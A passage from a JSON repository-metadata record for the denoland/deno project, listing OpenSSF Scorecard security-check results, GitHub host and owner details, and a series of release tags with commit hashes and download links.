status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at"